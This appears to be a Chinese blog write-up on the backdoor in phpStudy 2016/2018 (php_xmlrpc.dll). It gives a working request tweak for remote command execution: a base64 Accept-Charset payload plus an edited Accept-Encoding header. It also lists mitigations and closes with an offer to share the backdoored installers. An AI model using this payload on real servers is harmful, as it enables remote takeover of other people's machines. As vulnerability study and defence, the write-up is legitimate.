软件说明:
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。在“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章中,说明了一些网站下载的phpstudy版本中存在后门。数十万安装用户成为肉鸡。
漏洞验证:
存在后门的phpStudy版本为2016和2018版本。在安装的php目录下
存在版本的php文件为:
Php-5.2.17
Php-5.4.45
文件路径为:
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
判断是否存在漏洞:
PHP 5.2.17版本
PHP 5.4.45版本
漏洞利用:
安装完phpStudy后,访问
通过burpsuit抓取数据包,添加payload,这里,需要更改数据包内容
添加:
Accept-Charset: ZWNobyBzeXN0ZW0oJ2lwY29uZmlnJyk7
ZWNobyBzeXN0ZW0oJ2lwY29uZmlnJyk7为所执行命令的base64编码
删除:
Accept-Encoding: gzip, deflate中gzip,后面的空格(如果有空格的话,服务端就不会解析Accept-Charset字段中的base64字符串。去掉空格后,就会向下查找Accept-Charset字符串,并解码base64执行)
Accept-Encoding: gzip,deflate
Base64执行代码
放行数据包,可得命令执行的回显信息
缓解:
目前,绝大部分的下载站都更新了phpStudy安装包,带有漏洞得版本很难找到,验证方法很简单,也就是dll中的关键字eval.要想避免下载漏洞版本的软件,建议到官网下载,不要在下载站中下载来源不明的软件安装包。另外,网上大部分检测条件为文件hash值检测,也就是检测本地文件完整性。判断恶意hash值的文件。同时,检测本地是否存在可疑的命令执行,如net.exe、net1.exe、del、ipconfig.exe、ping.exe等可疑进程的出现。
注:此文章只用于学习交流!!!
如需带有漏洞版本的软件学习测试,请留言联系!